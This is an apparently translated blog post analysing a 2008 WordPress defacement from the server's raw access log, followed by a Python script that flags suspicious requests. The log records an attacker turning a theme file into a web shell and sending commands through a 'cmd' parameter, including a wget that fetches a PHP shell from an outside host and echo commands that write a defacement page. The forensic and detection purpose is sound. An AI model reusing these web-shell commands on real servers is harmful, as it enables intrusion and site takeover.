
Apologies in advance for the delay in posting part 2 of "antihackerlink was hacked" on this blog; real-world commitments got in the way. :) OK, straight to it: this time the forensic analysis is done from the raw access log of the antihackerlink server. We are deliberately providing only that access log here. Feel free to analyse it together here :).

88.237.213.52 – – [04/Dec/2008:04:52:28 +0700] “GET / HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:04:53:21 +0700] “GET /?page_id=2 HTTP/1.1″ 200 12535 ”
88.237.213.52 – – [04/Dec/2008:04:54:23 +0700] “GET / HTTP/1.1” <- “http://www.google.com/search?client=opera&rls=tr&q=antihackerlink.or.id&sourceid=opera&ie=utf-8&oe=utf-8”
88.237.213.52 – – [04/Dec/2008:05:01:50 +0700] “GET /wp-login.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:01:58 +0700] “POST /wp-login.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:01:59 +0700] “GET /wp-admin/ HTTP/1.1” <- “http://antihackerlink.or.id/wp-login.php”
88.237.213.52 – – [04/Dec/2008:05:02:06 +0700] “GET /wp-admin/edit.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:02:10 +0700] “GET /wp-admin/post.php?action=edit&post=34 HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:02:51 +0700] “GET /wp-admin/media-upload.php?post_id=34&type=image& HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:03:00 +0700] “POST /wp-admin/async-upload.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:03:05 +0700] “POST /wp-admin/async-upload.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:03:26 +0700] “POST /wp-admin/admin-ajax.php HTTP/1.1” <- “http://antihackerlink.or.id/wp-admin/post.php?action=edit&post=34”
88.237.213.52 – – [04/Dec/2008:05:03:26 +0700] “POST /wp-admin/admin-ajax.php HTTP/1.1” <- “http://antihackerlink.or.id/wp-admin/post.php?action=edit&post=34”
88.237.213.52 – – [04/Dec/2008:05:03:35 +0700] “GET /wp-content/uploads/2008/12/405.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:03:39 +0700] “GET /wp-content/uploads/2008/12/405.php/ HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:04:31 +0700] “GET /wp-admin/media-upload.php?post_id=34&type=image& HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:04:44 +0700] “POST /wp-admin/media-upload.php?type=image&tab=type&post_id=34 HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:05:18 +0700] “GET /wp-content/uploads/2008/12/403.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:05:20 +0700] “GET /wp-content/uploads/2008/12/403.php/ HTTP/1.1”
….. ……
….. ……
….. ……
….. ……
88.237.213.52 – – [04/Dec/2008:05:05:50 +0700] “GET /wp-admin/theme-editor.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:06:04 +0700] “GET /wp-admin/theme-editor.php?file=/themes/illacrimo/footer.php&theme=Illacrimo HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:06:39 +0700] “POST /wp-admin/theme-editor.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:06:50 +0700] “GET /wp-admin/theme-editor.php?file=/themes/illacrimo/footer.php&theme=Illacrimo&a=te HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:07:18 +0700] “POST /wp-admin/theme-editor.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:07:42 +0700] “GET /wp-admin/theme-editor.php?file=/themes/illacrimo/footer.php&theme=Illacrimo&a=te HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:09:56 +0700] “POST /wp-admin/theme-editor.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:10:08 +0700] “GET /wp-content/themes/illacrimo/footer.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:11:52 +0700] “POST /wp-admin/theme-editor.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:11:53 +0700] “GET /wp-admin/theme-editor.php?file=/themes/illacrimo/footer.php&theme=Illacrimo&a=te HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:11:58 +0700] “GET //wp-content/themes/illacrimo/footer.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:12:00 +0700] “GET //wp-content/themes/illacrimo/footer.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:12:05 +0700] “GET //wp-content/themes/illacrimo/
88.237.213.52 – – [04/Dec/2008:05:12:08 +0700] “GET //wp-content/themes/illacrimo/v4.php
88.237.213.52 – – [04/Dec/2008:05:12:09 +0700] “GET //wp-content/themes/illacrimo/v4.php
88.237.213.52 – – [04/Dec/2008:05:12:15 +0700] “GET //wp-content/themes/illacrimo/v454.php
—————-
88.237.213.52 – – [04/Dec/2008:05:12:54 +0700] “GET //wp-content/themes/illacrimo/footer.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:13:04 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=ls HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:13:08 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=ls%20-lia HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:13:45 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=wget%20http://hackzone.kiev.ua/403.txt;mv%20403.txt%20z.php;ls%20-lia HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:14:02 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=wget%20http://hackzone.kiev.ua/403.txt;ls%20-lia HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:14:28 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=wget%20http://0d4y.org;ls%20-lia HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:15:13 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=pwd HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:15:26 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=ls%20-lia%20/home/sakitjiw/public_html/antihackerlink.or.id/ HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:15:49 +0700] “GET /v4.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:18:59 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20’hacked%20ogi%20’%3Ev4.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:19:05 +0700] “GET /v4.php
88.237.213.52 – – [04/Dec/2008:05:20:18 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20x%20%3Ev4.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:20:21 +0700] “GET /v4.php
88.237.213.52 – – [04/Dec/2008:05:24:27 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20%3Ccenter%3E%3Ch2%3E%20%20Hacked%20%3Cbr%3E%20%20By_Ogmass%20&%20S4S_7%3Cbr%3E%20%20Got%20RooT%20?%3Cbr%3E%20%20uid=0(ogis4s)%20gid=0(ogis4s)%20groups=0(ogis4s)%3Cbr%3E%20%20Linux%20aquarius.romantis.net%202.6.9-023stab044.11-enterprise HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:24:36 +0700] “GET /v4.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:25:19 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo’%3Ccenter%3E%3Ch2%3E%20%20Hacked%20%3Cbr%3E%20%20By_Ogmass%20&%20S4S_7%3Cbr%3E%20%20Got%20RooT%20?%3Cbr%3E%20%20uid=0(ogis4s)%20gid=0(ogis4s)%20groups=0(ogis4s)%3Cbr%3E%20%20Linux%20aquarius.romantis.net%202.6.9-023stab044.11-enterprise HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:25:22 +0700] “GET /v4.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:26:59 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo’Hacked%20By_Ogmass%20&%20S4S_7’%3Ev4.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:27:01 +0700] “GET /v4.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:27:27 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/;echo%20’%20Hacked%20By_Ogmass%20&%20S4S_7%20’%20%3Ev4.php HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:27:41 +0700] “GET / HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:28:17 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/; HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:28:45 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=http://hackzone.kiev.ua/403.txt? HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:28:49 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=http://hackzone.kiev.ua/403.txt? HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:28:51 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=http://hackzone.kiev.ua/403.txt? HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:28:59 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=http://hackzone.kiev.ua HTTP/
88.237.213.52 – – [04/Dec/2008:05:29:03 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd= HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:29:08 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=pwd HTTP/1.1”
88.237.213.52 – – [04/Dec/2008:05:29:53 +0700] “GET //wp-content/themes/illacrimo/footer.php?cmd=cd%20/home/sakitjiw/public_html/antihackerlink.or.id/wp-content/themes/;ls%20-lia HTTP/1.1”

88.237.213.52 – – [04/Dec/2008:05:30:48 +0700] “GET /wp-admin/post-new.php HTTP/1.1”
………………………
88.237.213.52 – – [04/Dec/2008:06:46:38 +0700] “GET / HTTP/1.1″2286 “http://www.zone-h.org/component/option,com_attacks/Itemid,45/filter_defacer,By_Ogmass/”
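
A triage pass over the log above, as an added example that is not part of the original post: it tags the request patterns visible in the log (login POST, media upload, theme-editor POST, a `.php` file requested from the uploads directory, and a `cmd=` query parameter) and decodes the parameter value. The rule names and the `triage` function are assumptions of this example; the sample lines are taken from the log with quotes and dashes normalised to ASCII.

```python
import re
from urllib.parse import unquote

# Lines selected from the log above; typographic quotes/dashes normalised to ASCII.
SAMPLE = """\
88.237.213.52 - - [04/Dec/2008:05:01:58 +0700] "POST /wp-login.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:03:00 +0700] "POST /wp-admin/async-upload.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:03:35 +0700] "GET /wp-content/uploads/2008/12/405.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:06:39 +0700] "POST /wp-admin/theme-editor.php HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:13:08 +0700] "GET //wp-content/themes/illacrimo/footer.php?cmd=ls%20-lia HTTP/1.1"
88.237.213.52 - - [04/Dec/2008:05:15:49 +0700] "GET /v4.php HTTP/1.1"
"""

# ip, ident, user, [timestamp], opening quote (straight or curly), method, target.
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] [\u201c"](\S+) (\S+)')

# (tag, required method or None for any, regex on the normalised path)
RULES = [
    ("login-post", "POST", re.compile(r"/wp-login\.php$")),
    ("media-upload", "POST", re.compile(r"/wp-admin/(async|media)-upload\.php$")),
    ("theme-edit", "POST", re.compile(r"/wp-admin/theme-editor\.php$")),
    ("php-in-uploads", None, re.compile(r"/wp-content/uploads/.*\.php/?$")),
]

def triage(text):
    """Return (ip, timestamp, tag, detail) for each request matching a rule."""
    hits = []
    for raw in text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # elision markers, separators, blank lines
        ip, ts, method, target = m.groups()
        path, _, query = target.partition("?")
        path = re.sub(r"/{2,}", "/", path)  # the log shows //wp-content/...
        for tag, want, rx in RULES:
            if want in (None, method) and rx.search(path):
                hits.append((ip, ts, tag, path))
        # Take the value up to the next '&', URL-decoded, as the server parsed it.
        cmd = re.search(r"(?:^|&)cmd=([^&]*)", query)
        if cmd:
            hits.append((ip, ts, "cmd-param", unquote(cmd.group(1))))
    return hits

if __name__ == "__main__":
    for hit in triage(SAMPLE):
        print(*hit, sep=" | ")
```
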
